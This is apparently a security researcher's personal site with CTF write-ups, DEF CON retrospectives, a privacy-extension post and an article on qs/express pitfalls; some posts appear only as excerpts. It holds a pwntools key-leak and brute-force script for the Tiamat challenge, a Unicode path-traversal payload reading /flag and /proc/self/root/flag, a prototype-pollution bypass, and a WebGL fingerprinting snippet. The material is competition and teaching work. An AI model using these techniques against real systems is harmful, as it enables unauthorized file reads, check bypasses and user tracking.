A computer scientist by trade and a hacker at heart, I live at the intersection of software development and information security.

I've helped start a company, Zensors, whose productization of novel computer vision techniques earned it customers around the world.

A long-time member of CMU's hacking team, PPP, I have won several international CTF competitions, including the world finals three times.

Projects

Hypatia
Kill Switch
Manus Dei
Aroma
Soustech
Shelf
Befungell

Blog Posts

Real World CTF RWDN: An Unnecessary Bug
Feb 01 2022

Although I ended up not spending much time on this year's RWCTF, I did (with the help of my awesome teammates) solve one problem: RWDN. The intended solution involved a bug in one of their middleware handlers that was designed incorrectly and allowed attackers to bypass a crucial check. However, I found that there was an alternate bypass that would have worked even if their code was correct. Let's discuss what the bug is, and why it could be a problem for "real world" applications.

Update

The author, @wupco1996, got back to me to let me know that this was actually the intended solution, and the other more obvious one was just a normal, everyday bug. Props to them for a really clever problem, and it goes to show that even the best security experts can slip up from time to time.

Original

As an added bonus, no crash means that we get to see the generated file name without having to compute the hash ourselves for part 2!

Broader implications

Obviously, in this instance, the impact stems in part from the decision to control file access via query parameters. Yet in order to exploit the prototype pollution, all we needed to do was access a file whose name was an integer greater than zero. Using numeric keys for forms is not that unusual a practice, and it means that when using express-fileupload, the programmer cannot trust that a key is on req.files itself.

Fortunately, this is an easy fix, both for express-fileupload (which should replace instance = instance || {}; with instance = instance || Object.create(null);) and for the user (who can install middleware that explicitly sets req.files to Object.create(null)).
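
For illustration, here is a minimal sketch of the consumer-side defense (the route, query parameter, and responses are my own invention, not RWDN's code): only keys that live directly on req.files are trusted, so a polluted prototype can't smuggle entries in.

import express from "express";
import fileUpload from "express-fileupload";

const app = express();
app.use(fileUpload());

app.get("/check", (req, res) => {
    const key = String(req.query.name);
    const files = req.files ?? {};

    // Only trust keys that live on req.files itself, never keys that would
    // resolve through a (possibly polluted) prototype chain.
    const present = Object.prototype.hasOwnProperty.call(files, key);
    res.send(present ? "uploaded" : "no such upload");
});

app.listen(3030);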

All in all, this is not a high-impact bug, but it could have allowed RWDN to omit an intentional bug without impacting the problem's solvability, all while making it that much more "real".

Hacking from the Pool: A DEF CON 2021 Retrospective
Aug 11 2021

Much like the rest of the world, DEF CON CTF returned this year in a hybrid online/in-person format. For those who wanted it, space was reserved on the game floor to hack amidst the other teams that came to Vegas. For the rest of us who were still a bit nervous about large crowds, the infrastructure would be hosted online and accessible from anywhere in the world. Torn between the two choices, we opted this year for a middle ground: all of us together, but in a house 300 miles away.


Introduction

Hello, Goodbye

DEF CON CTF is one of the most well-known security competitions in the world. Often considered the World Finals (or "Olympics") of hacking, it draws teams that qualify either by winning other notable competitions or by placing high enough in its dedicated qualifier round.

As a consequence of the competition's longevity, and the onerous burden of running it, the organizing team ends up changing every couple of years. For the past four years, the CTF has been led by the Order of the Overflow, who have announced that this year's competition was their last. In recognition of their hard work, and all of the new ideas that they've brought to the table, after I finish my retrospective I would like to take a moment to discuss their legacy and what future organizers can learn from their tenure (as viewed by a competitor).

One Final Hill to Climb

With that said, it is helpful to understand the competition that they ran before discussing what happened during it. This game was not much different from previous years, but to save you the trouble of looking at another writeup, I'll summarize the structure here.

DEF CON CTF takes place over three days and includes two different types of challenges. The most well known of these are Attack/Defense (A/D) challenges. Competitors can earn points for these in two ways: by attacking other teams and by preventing teams from attacking them. Attack points are earned for every team they score against in a given five-minute round, and defense points are earned when no team attacks them in a round (provided at least one successful attack was launched that round).

Attacks may be launched directly against a team, in which case the network data will show evidence of the attack, or in "stealth" for full anonymity, but only half the points. Additionally, these services may be modified in such a way that functionality is preserved, but attacks no longer land. This process is called patching, and is the main way that defense points are earned.

As mentioned, there is another type of challenge called King of the Hill (KotH). These can be better thought of as =="games within the game"== and accumulate points differently.

Another substantial source of stress (physical as much as mental) is the frequent lack of sleep during the competition. Because problems remain open overnight and new problems are released for overnight study, many competitors get only a handful of hours of sleep a night while the competition is ongoing. I recognize that this is a highly controversial opinion, but I would love to see an attempt to make DEF CON CTF a competition that you only play during the day.

Taken as it is right now, I don't think that the competition would support this style of gameplay effectively. Instead, intentional problem design would be needed, not only to include a better range of bugs (shallow vs. deep), but also a way to score differently based on those bugs, with the latter serving to incentivize finding deeper ones. For instance, even if you can only earn points from it for two hours, if a deep bug is worth three times as many points as a shallow bug, then it would still be worthwhile to exploit.

Experimentation

The final legacy of OOO I want to mention is their dedication to experimentation. Admittedly, this is a tricky one to discuss because I both appreciate it and find myself wary of it. Many of the details mentioned above are the result of experimentation from the Order. However, some of their other experiments were not always as successful.

Ultimately, what DEF CON CTF "should be" is really a question only the organizers get to answer. For some, it is an opportunity to find the best hackers in the world. For others, it is a chance to push the boundaries of the community and stretch it to its limits. For myself, DEF CON CTF is something more of a climax — the event toward which the rest of the season points. The degree to which experimentation is relevant in this competition then depends largely on how you answer that question. I prefer it in moderation; a little experimentation keeps the game fresh, but I generally prefer stability to ambition in my problem design. Said differently, my hope for this CTF is that it reflects the best things that are happening in the community at the moment more than I want it to shape the community.

Final Thoughts

The Order of the Overflow has put an unimaginable amount of work into running DEF CON CTF over the past four years. The whole community owes them its appreciation for the sacrifices they have made and the dedication they have shown. They have also left an indelible mark on the competition, one that will hopefully lay a strong foundation for future iterations.

As the CTF community continues to grow and mature, I suspect that DEF CON CTF will only become more of a focal point for the players. As such, I hope that we as a community can encourage and support the next organizers who take on this mantle.

I would like to offer a final congratulations to the Order of the Overflow on a successful fourth DEF CON, and to celebrate Katzebin, Tea Deliverers, and all of the other teams who played incredibly well again this year. Great job everyone, and I am excited to see what next year brings!

Zach Wade is an alumnus of computer science at Carnegie Mellon University. He is also a member of the PPP, CMU's competitive hacking team. You can find him at @zwad3
Kill the Lights: Taking Control of Digital Privacy
Jul 06 2021

A few months ago I installed the latest Android beta, excited by its new design language. Three days later I had to uninstall it when I got stranded at the grocery store thanks to the Uber app crashing. However, in that short time I benefitted from another new feature (that iPhone users already enjoy) wherein the OS would notify me when an app used the clipboard. Excited by this, I took the same ideas and ported them to Chrome via an open source extension called Kill Switch.

Short on time? Download Kill Switch from the Chrome Web Store.

Browsers are easily one of the most impressive pieces of consumer technology in general use today. Not only do they offer developers a myriad of tools to create powerful applications with ease, they do so with a focus on security that is unparalleled in modern software development. With protections at every level of abstraction and a speedy update cycle, most users are at ==little risk== of having their data compromised by bad actors.

At the same time, the sheer quantity of APIs exposed means that the potential attack surface is huge. Even so, just because something is not a security risk doesn't mean it isn't a privacy risk. A great example of this is WebGL, which has historically been used as a means of fingerprinting devices due to the eccentricities of different hardware. Obviously, this cannot be used to leak data directly, but it can be used to coarsely track people, thus violating users' privacy.
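
As a rough sketch of how that kind of tracking works (the hashing scheme here is my own illustration, not any particular tracker's code), a page can read hardware-specific strings out of a WebGL context and hash them into a stable identifier:

async function webglFingerprint(): Promise<string> {
    // Read hardware-specific strings from a WebGL context. Nothing here leaks
    // data directly; the combined value is just likely to differ per machine.
    const canvas = document.createElement("canvas");
    const gl = canvas.getContext("webgl");
    if (!gl) return "no-webgl";

    const ext = gl.getExtension("WEBGL_debug_renderer_info");
    const parts = [
        gl.getParameter(gl.VENDOR),
        gl.getParameter(gl.RENDERER),
        ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : "",
        ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : "",
    ].join("|");

    // Hash the result so the identifier is compact and stable across visits.
    const digest = await crypto.subtle.digest("SHA-256", new TextEncoder().encode(parts));
    return [...new Uint8Array(digest)].map((b) => b.toString(16).padStart(2, "0")).join("");
}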

Just as with security, browsers are continuously adding mitigations to prevent these types of abuses. However, they do so opaquely and offer little insight to end users about what risks they are being exposed to. Since privacy is inherently personal, and every individual has different thresholds of acceptability, I believe that users should have the tools and opportunity to easily control their exposure.

Kill Switch

For my own use, and for those with similar proclivities, I took several of these abusable APIs and wrote a Chrome extension to monitor them. Per site, it provides users with several configuration options for each of these APIs. Namely, it can unconditionally enable or disable them, notify the user when they're invoked, or prompt the user for permission on first access.
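
The real extension is more involved, but the core trick is to replace a sensitive API with a wrapper before the page's own scripts can grab a reference to it. A minimal sketch for clipboard reads (notifyUser is a hypothetical stand-in for the extension's UI):

declare function notifyUser(message: string): void; // hypothetical UI helper

const originalReadText = Clipboard.prototype.readText;

Clipboard.prototype.readText = function (this: Clipboard): Promise<string> {
    // Surface the access before deferring to the real API. A determined page
    // could restore the original, which is why this is a privacy aid rather
    // than a security boundary.
    notifyUser(`${location.hostname} read the clipboard`);
    return originalReadText.call(this);
};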

This is the part, unfortunately, where I need to reiterate that this is intended to be a privacy tool, not a security one. Although I take steps to run Kill Switch before any of the other scripts on the page, a dedicated developer could certainly find ways to bypass it. Because of these adversarial cases, if you are worried about any particularly sensitive APIs, please disable them at the browser, OS, or even hardware level. Any of those will provide you with far better guarantees.

With that said, however, for casual web browsing, Kill Switch is an unobtrusive way to get unique insight into what websites are collecting on you, and in many cases will give you the power to put a stop to it. Plus, it's fully open source and open to contributions!

The Bigger Picture

At the end of the day, Kill Switch is neither novel, nor technically impressive. Yet, I think it's a useful piece in the ongoing dialogue of digital privacy in an increasingly technocratic internet. Over the next few years this conversation is only going to become more difficult and more important.

If this is something that interests you, I would encourage you to think about what digital privacy looks like, and how we can start to move in the right direction. Projects like these are a good way to prototype ideas and experiences, but even just organizing your thoughts into a blog post or article can be a great way to spur discussion. If you do, please share it with me on Twitter or by email! I'm excited to see where the next few years take us.

The Many Heads of DEF CON Quals
May 04 2021

When you get right down to it, I'm a web guy. I know JavaScript back to front and can spot an SSRF a mile away. So what am I supposed to do when DEF CON CTF has no web?? Dust off IDA and remember how to reverse... 8 different architectures at once.

The Slow Realization

Tiamat was a reversing problem released near the halfway point of DEF CON CTF Quals. Having just solved Rick, a different reversing problem, I was at least warmed up (and resigned to the lack of web). The download came with all of the materials needed to build the problem yourself, including a Dockerfile, an executable, and, concerningly, ==a custom build of QEMU==.

We also noticed that the v function would xor the desired key with urandom before checking it, unless the joshua backdoor had been activated, in which case it would just check it normally.

Finally, and most crucially, we found that after at least one validation attempt, for every use of the n command, the p command would print one byte past the user's input into the xored buffer. However, due to limits on how many times n could be invoked, this would only leak 27 of the 32 characters of the encrypted key.

This was quite strange, and we tracked it down to a register called r0 at instruction 0x102bc, but we could never figure out what it was being assigned to. We noted it down as an oddity of the system and went on our way.

However, since the data being leaked was the encrypted key, and the encryption key was only 4 bytes long, we realized that we could simply brute-force each key byte independently, keeping the values that produced valid ASCII hex characters. Scripting this was straightforward, and yielded 8 possible prefixes:

from typing import List, Tuple
import itertools

from pwn import *

def solve(data: bytes):
    # For one slice of the leak, find every single-byte key that xors the
    # slice into valid ASCII hex characters.
    def brute_set(bs: bytes):
        res: List[int] = []
        for i in range(256):
            success = True
            for b in bs:
                if chr(b ^ i) not in "abcdef0123456789":
                    success = False
                    break
            if success:
                res.append(i)

        return res

    # Decrypt the whole leak with a candidate 4-byte key.
    def try_key(key: Tuple[int, int, int, int]):
        return "".join([
            chr(d ^ key[i % 4])
            for i, d in enumerate(data)
        ])

    # The key repeats every 4 bytes, so byte i of the leak was xored with key[i % 4].
    a = brute_set(data[::4])
    b = brute_set(data[1::4])
    c = brute_set(data[2::4])
    d = brute_set(data[3::4])

    keys = itertools.product(a, b, c, d)

    for key in keys:
        print(try_key(key))

connection = remote("tiamat.challenges.ooo", 5000)

# Make one (failing) validation attempt, which arms the off-by-one leak.
connection.send("e00000000111111112222222233333333v")
connection.recvuntil("""Authorization failed!
READY
""")
# Each n/p pair prints one more byte past our input into the xored buffer.
connection.send("np" * 25)

for i in range(25):
    connection.recvuntil("00000000111111112222222233333333")
    data = connection.recvuntil("\nREADY")[:-6]
    if len(data) > 26:
        # Only bother once we've leaked (nearly) the full 27 bytes.
        print("------")
        solve(data)

Yielding

d64ce88b7426f0245c5102f91a9
d64be88c7427f0255c5002f81a9
c64cb88b0426a0242c5172f96a9
c64bb88c0427a0252c5072f86a9
764c688bd4265024fc51c2f9ba9
764b688cd4275025fc50c2f8ba9
064c188bc4262024ac51d2f9ea9
064b188cc4272025ac50d2f8ea9

With Apologies to OOO's Infrastructure

At this point, we had only two and a half hours left in the competition, and were in a close third place. Sleep had been a luxury all weekend, and I was less than confident in our ability to find the missing piece of the puzzle. However, we had found 8 possible prefixes, missing only 5 nibbles each, for a total of 23 bits of entropy.

Now, for those keeping score at home, this means that there were a total of 8,388,608 possible keys to try. On a whim and a prayer, I hacked together a script to try all of them. Limiting myself to 32 simultaneous connections (in hopes that it wouldn't prevent other players from hitting the problem) and 8 checks per connection, I was able to achieve a throughput of roughly 250 keys per second. Unfortunately, this meant that I only had roughly a 1 in 4 chance of solving it before the competition ended. My options at this point were: risk causing a DoS for other teams, or eat the 25%.
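
For those checking the math, a quick sketch using the rough figures above:

// 8 candidate prefixes, each missing 5 nibbles: 8 * 16^5 = 2^23 keys.
const keyspace = 8 * 16 ** 5;                    // 8,388,608
const rate = 250;                                // keys per second across 32 connections
const hoursToExhaust = keyspace / rate / 3600;   // ~9.3 hours for the full keyspace
const hoursLeft = 2.5;
console.log((hoursLeft / hoursToExhaust).toFixed(2)); // ~0.27, i.e. roughly 1 in 4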

Ultimately, I decided that since this was almost certainly not the intended solution, I should not risk making the service unavailable, so I accepted the fact that I was unlikely to actually get the flag.

However, by sheer luck, the flag happened to be in the first 1.8 million or so of my enumeration. Thus, with only 30 minutes left in the game, I was able to solve the problem and we took the lead.

The Missing Link

Speaking to the problem's author afterward, I realized just how close we had come to solving it the intended way. That register I mentioned earlier, r0, whose value I couldn't pinpoint, was actually the result of a sys_open ARM syscall. That call returns the lowest unused file descriptor, a number that was ever increasing due to a mishandling of close in the n command. However, I had noticed a while back that the v command also did not close its file descriptor. I assumed this was just a bug, since I didn't see any way to use it.

Consequently, if we had caught the origin of that register, we would have had all the information we needed to solve it with only 8 tries, not 8 million.

Thanks

Regardless of my own ineptitude, Tiamat was an excellently silly challenge, and a lot of fun to solve. Full kudos to Erik for putting it together, and to my teammates for solving it with me!

Kernel Panic: A DEF CON 2020 Retrospective
Aug 17 2020

In many regards, 2020 has felt like a collective Blue Screen of Death. However, a raging virus was not enough to keep DEF CON from happening. This year it booted into Safemode, an online-only version of the popular security conference. Along with it, the titular DEF CON CTF reimagined itself for a virtual future.

1 Minute to Midnight

DEF CON is an annual conference traditionally held in Las Vegas during the summer. A bizarre mish-mash of hardcore hacking and excessive partying, it is something most members of the infosec community will find themselves visiting at least once. This year, 16 teams of hackers, out of a field of more than 1,500, qualified for its most well-known competition, DEF CON CTF.

As in previous years, I competed in DEF CON CTF with Carnegie Mellon's hacking team, the Plaid Parliament of Pwning (PPP). Similarly, the Order of the Overflow returned to host. Although we did not win, it was an exciting competition with difficulties and challenges unique to these times.

Postpandemic Cyberwarfare

A solid foundation

In what was a huge relief, the game this year was very similar to previous years. I've covered this before, so I'll keep this section short, but the game consists of roughly 300 rounds wherein teams can score points in the following ways (a rough scoring sketch follows the list):

  • Attacking other teams: Teams will score 1 attack point (or 0.5 points as I'll explain momentarily) for each flag of their opponents that they steal.
  • Defending their services: Teams will score 1 defense point for each of their services that is not successfully attacked in that round (while there is at least one opponent who is under active attack)
  • Scoring well in King-of-the-Hill challenges: For each KotH challenge, the current best scorer will earn 10 points, second best 6, then 3, 2, and 1. Teams below the top five do not score.
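
To make those rules concrete, here is a rough sketch of how a single round might be tallied. This is my reading of the rules, not OOO's actual scorebot, and all of the names are made up:

interface RoundResult {
    flagsStolen: number;        // opponents we captured a flag from this round
    stealthFlags: number;       // of those, how many were submitted in stealth mode
    servicesAttacked: number;   // our services that at least one opponent exploited
    totalServices: number;      // simplification: assumes every service saw attacks somewhere
    kothPlacements: number[];   // our placement (1-5) on each KotH challenge, if any
}

const KOTH_POINTS = [10, 6, 3, 2, 1];

function roundScore(r: RoundResult): number {
    const attack = (r.flagsStolen - r.stealthFlags) + 0.5 * r.stealthFlags;
    const defense = r.totalServices - r.servicesAttacked; // 1 point per untouched service
    const koth = r.kothPlacements
        .map((place) => KOTH_POINTS[place - 1] ?? 0)
        .reduce((sum, pts) => sum + pts, 0);
    return attack + defense + koth;
}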

Gameplay proceeds with teams exploiting, patching, and competing with each other every round to score as many points as they can before the next round. In this regard, the game was almost identical to previous years. The ==only substantial change== was related to network captures.

At the same time, problems often have components that are unrelated to the actual challenge itself. For instance, whether my XSS victim is named "admin" or "root" is probably irrelevant to the actual exploit. I think it could ease a lot of frustration to have this distinction codified in a public FAQ where non-critical questions are answered in full view of the competition, whereas exploit-adjacent questions are given a friendly "Hack Harder."

By collecting this information publicly, and by being slightly more generous with the information we provide, we as organizers might be able to make our problems more enjoyable and educational for those playing. I say "we," because I have an opportunity to try this out as one of the organizers of PlaidCTF. I might start with a single problem, but this could be a valuable method for improving the communication between players and organizers, and in relieving many irrelevant frustrations.

Until Next Year

As always, DEF CON CTF really shows its merits as one of the biggest CTFs of the year. Especially given the circumstances of the competition, I want to thank the Order of the Overflow for the hard work they put into making this happen.

Additionally, I want to thank all of my teammates and friends who played an incredible game, and who make even stressful CTFs fun (sorry I was so useless this year, oops).

Finally, I want to offer all of our competition a hearty congratulations on a job well done. We saw a lot of creativity and ingenuity in the attacks and patches everyone levied. To A*0*E especially, congratulations on your hard-earned win. It has been many years coming.

And to everyone, I look forward to seeing you during PlaidCTF and future DEF CONs. Thanks!

Zach Wade is an alumnus of computer science at Carnegie Mellon University. He is also a member of the PPP, CMU's competitive hacking team. You can find him on Twitter as @zwad3
PlaidCTF 2020: Making the Watness 2
Apr 26 2020

For PlaidCTF this year, I created a demake of The Witness in Hypercard. Since most of the technology I used is over 20 years old, and a lot of the documentation seems lost to time, I created a short video that discusses how I made it, and what resources I used in order to make it happen.

Inspiration

In addition to The Witness itself, my main source of inspiration was this interview from Ars Technica.

Code

All of my code can be found on Github.

Tools

Nearly all of the development of The Watness was done inside of OS 9. Here are the tools I used for that

  • SheepShaver: SheepShaver is a PowerPC emulator designed specifically for running classic versions of Macintosh OS.
  • Macintosh OS 9: Although Myst was likely developed on System 6/7, I went ahead and used OS 9 because it was easier. Nearly everything that I've used here will work on System 7 if you choose, but you may need older versions of them.
  • Hypercard 2.4: Hypercard is the tool that The Watness is built in. You will need a copy of Hypercard to both play and edit any files associated with the game.
  • QuickTime 4: Hypercard comes with QuickTime 3, but I was unable to get it to display JPEGs without crashing. Upgrading to QuickTime 4 solved this problem.
  • Macintosh Programmer's Workshop: MPW is an IDE (ish) for writing native code in OS 9. I used the Gold Master edition, but any "recent" version should work. If you install GM, however, you will also need to separately install Apple Pascal.
  • ResEdit: ResEdit allows you to view the resource forks of files. This isn't needed to make the challenge, but is helpful in understanding how it all works.
  • Stuffit Deluxe: Stuffit is a suite of compression/archival utilities for Macintosh systems that properly handles binary data and resource forks.

In addition to the OS 9 utilities, I also used TypeScript for all of my offline scripts.

References

The vast majority of my time was spent trying to piece together an understanding of how everything works from the limited documentation I could find. Here is a list of what I used, annotated with what I took away from it.

  • XCMD Cookbook: This is an interesting introduction to how XCMDs work. It has a lot of useful information, but do not use any of the code. I got sucked down a rabbit hole of trying to make this code work, only to find out many hours later that the framework referenced therein had since been superseded by a built-in library called HyperXCMD.
  • All MPW Pascal Interfaces: I stumbled across this while trying to make the previous code work. It contains the only documentation I could find of the HyperXCMD library. There are a few things to note,
    • If you're using the HyperXCMD library, you will almost certainly also want the Types library. A lot of the code I saw used MemTypes instead, but I did not have this installed. Types however contained all of the structures that I actually needed.
    • EvalExpr is not eval in the modern sense of the term. Instead, it parses the input as though it were a Hypertalk statement, but does not run it. To execute the resulting handle, use RunHandler.
    • There are 3 types of strings referenced: Str/Pas, Zero, and (sometimes) Handle. A handle is a Hypertalk string, and a Pas is a Pascal-style string. Zero took me some time to figure out, but it's a C-style string (null or "zero" terminated).
  • Hypertalk Script Language Guide: An excerpt from an early book on programming for Hypertalk.
  • The Apple Pascal Docs: A somewhat helpful guide to writing Apple Pascal. It was missing a lot of useful information, but it gave me enough so that I could piece the rest together.
  • The HCSC Color Tools Guide: A hypercard stack that goes into minimal detail about how to use Color Tools.

Final Thoughts

This project was a lot of fun, and taught me more than I ever expected to know about developing for classic Macs. If you have any questions about the project, or need help with your own, please feel free to reach me by Twitter (@zwad3) or by email ([email protected]).

The Lies We Tell Ourselves
Dec 27 2019

With 30,000,000 weekly downloads, it's reasonable to expect that qs has been written from the ground up to be efficient, secure, and robust. Unfortunately, as is often the case with small projects that become unexpectedly big, it is plagued by legacy options and sibylline code. Without understanding how it really works, it is incredibly difficult to use safely.


Modern engineering is built heavily on trust. We trust hardware manufacturers to build predictable devices. We trust operating system developers to implement secure protections. Most commonly, we trust libraries to choose safe paradigms. This trust is essential for nearly all development; however, it can sometimes be misplaced.

When we naïvely use someone else's work, we allow ourselves to be blindsided by the mistakes that they have made. As a result, it is critical to understand not just what we are using, but how it actually works. From there, we can develop ways to protect ourselves and our users.

A Case Study

Constantly trying to understand every library and service you use may seem sisyphean. However, even the most basic tools can have nasty side effects. To illustrate the dangers of blind trust, we are going to take a deep dive into express.js, and more specifically, the popular library qs. When reading this, keep in mind that more than 5 million packages use this library.

The Good

For most use cases, express is the best server framework for writing web applications in Node. Even when you use a different web framework, there is still a high probability that it is using express under the hood. There's nothing inherently wrong with this; by and large, express is reliable and well designed. However, in an attempt to make users' lives easier, it includes additional, somewhat hidden functionality.

Consider this very basic server example:

import * as express from "express"

const app = express();

app.get("/", (req, res) => {
    // Access the query string from the URL
    let obj = req.query.obj;
    res.send(typeof obj);
});

app.listen(3030);

==What are the possible values that you can receive back from the server?==
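
It is worth actually trying this before reading on. With express's default (qs-backed) query parser, the same handler can respond with several different types; the little harness below is my own test, not from the original article:

// Run against the server above (Node 18+ for global fetch).
for (const q of ["?obj=hello", "?obj[a]=1", "?obj[]=a&obj[]=b", ""]) {
    const body = await fetch(`http://localhost:3030/${q}`).then((r) => r.text());
    console.log(q || "(no query)", "->", body);
}
// ?obj=hello         -> string
// ?obj[a]=1          -> object     (qs builds { a: "1" })
// ?obj[]=a&obj[]=b   -> object     (an array)
// (no query)         -> undefined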

With these two checks in place, using qs becomes safe and reliable. Even when qs decides to produce a type that was previously unexpected, with a reliable marshaller, this will be caught immediately.

The Lies We Tell Ourselves

Regardless of how you address these problems, it should be clear at this point that the web of trust we weave is fragile, and can fall apart anywhere. No one will ever completely understand every single thing that makes a computer work, but when we drop our presumptions of safety, we become more equipped to prevent problems before they happen.

I have tremendous respect for everyone who has worked on qs over the years. Maintaining an open source package is challenging in the best of times, but trying to ensure that your changes don't break half the web must certainly be daunting.

In writing this article, my hope is not to publicly shame the project, but to help illustrate how messy modern development can be. I would encourage everyone to critically evaluate everything that you trust, and once you understand it, share it with the rest of us.


Zach Wade is an alumnus of computer science at Carnegie Mellon University. He is also a member of the PPP, CMU's competitive hacking team. You can find him at @zwad3

Here We Go Again: A DEF CON 2019 Retrospective
Aug 15 2019

As the Vegas festivities wrap up, I once again have an opportunity to reflect on the year's biggest CTF and the culmination of my time as an undergraduate with the Plaid Parliament of Pwning. I'm looking forward to playing with them as an alumnus, but now is a good time for me to share some of my thoughts with the rest of the community and to hear what everyone else is thinking.

With that in mind, let's talk DEF CON!

It's hard for me to believe, but this post marks the fourth DEF CON retrospective I've done. In the past I've mostly talked about the experience without going into much depth on the problems, but I got some feedback this year that people wanted more technical detail. As a result, this year's writeup is a lot longer (and a little bit later), but covers every problem in varying degrees of technicality.

What is DEF CON

DEF CON CTF is the premier security competition. Occurring annually at the same time as the eponymous conference, the competition tasks qualifying teams with hacking into vulnerable services for the purpose of extracting hidden pieces of data called "flags". For this reason, this competition — as well as others like it — is called a capture the flag (CTF).

What separates DEF CON from other similar competitions is primarily the importance placed on it by the community, and the work that goes into organizing it. Not only is it highly contested by many of the world's best hackers, but it employs an attack/defense style of gameplay that pits competitors directly against each other in a frenetic and chaotic manner. As with most such competitions, not only are players allowed to attack each other's services, they are also expected to protect their own by removing the bugs.

For the past two years, DEF CON has also introduced a third type of gameplay called King of the Hill (KotH). This game style is somewhat unique to the current organizers, the Order of the Overflow, who introduced it when they took over the competition from its previous organizers, the Legitimate Business Syndicate. As the name suggests, King of the Hill differs from traditional attacking in that it challenges teams to outperform their opponents in some sort of hacking-related competition. As a result, for any given DEF CON round, teams can do any of the following actions:

  1. Steal a flag (once per service per opponent)
  2. Upload a patch (once per service)
  3. Attempt the King of the Hill

Consequently, these are also the ==three ways that teams may score points.==

FeverDream.js

After everyone got settled the next day, throwing exploits and deploying patches, it was time for the promised final problem, jtaste. In a move that should surprise no one at this point, it was a web problem. However, unlike the previous problems, which were more web-adjacent, this one was an honest-to-goodness run-the-gauntlet web problem.

The only issue with it? It made absolutely no sense.

Without writing any code, let me describe how this problem worked when used correctly.

  • Users were shown a 5x5 grid, a clear button, and a submit button
  • When you hovered over a grid element, it added a corresponding number to a chain shown at the top, as well as sending that number and its "signature" to the server.
  • The server verified that the signature was correct, then appended just the signature to a session variable called verified
  • When you clicked submit, it would send the values shown at the top to the server. The server would then check the length of what you submitted against the length of verified. If they didn't match, it would complain at you. If it did match, however, then it would set the session variable counter to be the array of numbers you uploaded.
  • Then, if you hit the /persistent endpoint, it would
    • Filter out all of the 46s and 47s from the array (ASCII codes for "." and "/" respectively)
    • Prepend an array that had the character codes for "./public"
    • Call unidecode on every element of the resulting array
    • Convert that into a string
    • Read the contents of the file referenced by that string
    • Write the stringified original array to that file
    • Return the original contents to the user

...what?

I wish I could give you a nice interpretation of what this program was supposed to be simulating, but honestly it made no sense to me whatsoever. Fortunately, just from that description it should be obvious what the solution is.

Simply create a string for the relative path you want to read, such as ../../../../flag, convert all of the characters to their char codes, and replace all of the 46s with 8228s ("one dot leader") and the 47s with 1793s ("syriac supralinear full stop"). Then, for each letter, send any number and signature from your session to the server; next, send the array you produced from your path; finally, call /persistent.
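
A sketch of building that payload (the HTTP plumbing, i.e. the session cookie, the signature replay, and the /persistent call, is omitted here):

// Convert a relative path into the array jtaste expects, swapping the
// filtered 46s (".") and 47s ("/") for the stand-in code points noted above.
function buildPayload(path: string): number[] {
    return [...path].map((ch) => {
        const code = ch.charCodeAt(0);
        if (code === 46) return 8228; // "one dot leader"
        if (code === 47) return 1793; // "syriac supralinear full stop"
        return code;
    });
}

console.log(buildPayload("../../../../flag"));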

Likewise, this also becomes trivial to patch because you can simply wait until the flag is being read, then replace the flag value with a boring string (in our case xxx), and no one can solve the problem with this method.

This solution got us a few points while people were still figuring out how it worked, but everyone shut it down pretty quickly. Depending on how people patched it, however, we were still able to use it to leak their server code, allowing us to read their patches. In a few other cases, they were just preventing you from reading /flag, so we could get around this by reading /proc/self/root/flag. While this allowed us to still get 3 teams every round, it was only a drop in the bucket.

The problem was using webpack-hot-reload, which seems like it was supposed to be an alternate solution path wherein you overwrite one of the webpack'd source files to get it to include the flag from elsewhere. However, I was not able to use this setup to perform any kind of write outside of the /public directory. As such, I could find no way of getting webpack to pick up any of the files I had written.

While I generally like the fact that there was an easy web problem to finish the game, this one did not make much sense to me as a problem, and seemed a little bit too easy to be anything more than just something to keep people busy.

Good Vibes

As the competition wound down, and before I started to clean everything up, I had a little bit of time to reflect on the year's competition. Overall, despite some problematic problems, and some bad networking on my part, I found it to be one of the most fun DEF CONs I had played in. In part, this was because I broke from my normal routine of just playing defense. While useful, especially given our propensity for it, defense is rarely the most interesting role to play.

Yet, a lot of the fun this year came from the fact that the problems were just, well, fun. Even jtaste, the silly web problem released at the end, was low stakes and amusing enough to be enjoyable. Additionally, either due to the space we had or the OOO's benevolence, the CTF atmosphere was significantly calmer this year. It's hard for me to overstate how much of an impact this has on my ability to enjoy the CTF. As cool as GoogleCTF-style visuals and sound effects are, when you're in the middle of a stressful competition, all they do is elevate that stress. Even the loud memes that were on display last year really did not make for a pleasant workspace. Fortunately, this year's combination of CTF-related visuals, relatively calm music and videos, and the pleasant white noise of people talking around you made for an overwhelmingly better environment.

Another thing that made this DEF CON more pleasant was that the OOO's infrastructure and problem development had clearly matured. While there were certainly some issues, they were far less impactful and frustrating than in last year's DEF CON. It's great to see the way that they are learning from each competition, and improving it.

Aiding this fact is likely their decision to keep the format the same as last year's. I understand that not everyone is a fan of King of the Hill, but I think they made the right call in keeping with a familiar gameplay style so that they could focus on the less exciting but just as important aspects of the game. Knowing them, I'm sure they'll want to experiment further next year, yet as nervous as that makes me, I'm much less worried having seen how things went this year.

Addressing the Future

Although this year's game went very well, there are still a few things that can be improved upon by future hosts.

The biggest concern we had was the rate limiting method employed. Inherently, we're not opposed to rate limiting. Ensuring that no one abuses the infrastructure is crucial in ensuring a smooth game. However, the policy of "if you exceed your quota, we immediately disconnect you" leads to a lot of trepidation when approaching new problems. A prime example of this was Super Smash OOOs. As mentioned prior, there was a SQL injection in the remote server that you had to find blind. One of the reasons we did not find this is because none of our members were willing to poke around the production instance of the problem for fear of disconnecting us from the game. If the policy had been softer — i.e. temporarily dropped packets or even public shaming — it is far more likely that we would have explored that avenue.

Likewise, another issue that we struggled with this year was understanding the problem scopes. As mentioned, there was the issue with SQL injection in a wasm problem, but there was also a lot of time spent elsewhere. For instance, in the shellcoding problem, we tried a few things to attack the problem runner itself instead of solving the original problem. For that one, Shellphish claims they actually had an exploit running against buggy server code before the organizers patched it. While I understand the value of having players look for alternate solutions to problems (thinking out of the box, as it were), in a competition like DEF CON it's important to have a well-defined scope for problems.

The only other feedback I have is largely unchanged from last year. The problem health indicators, which have 5-ish states ranging from good to bad, still feel really arbitrary. Problems sometimes jump multiple states at once, and knowing something is at "ok", for instance, does not actually give competitors a good feel for how much longer it will be up. Arbitrary problem lifetimes are certainly not an issue unique to the OOO's games, but they are more obvious as a result of the health indicators. I think they're a great idea, but they need a little bit more consistency to actually be helpful.

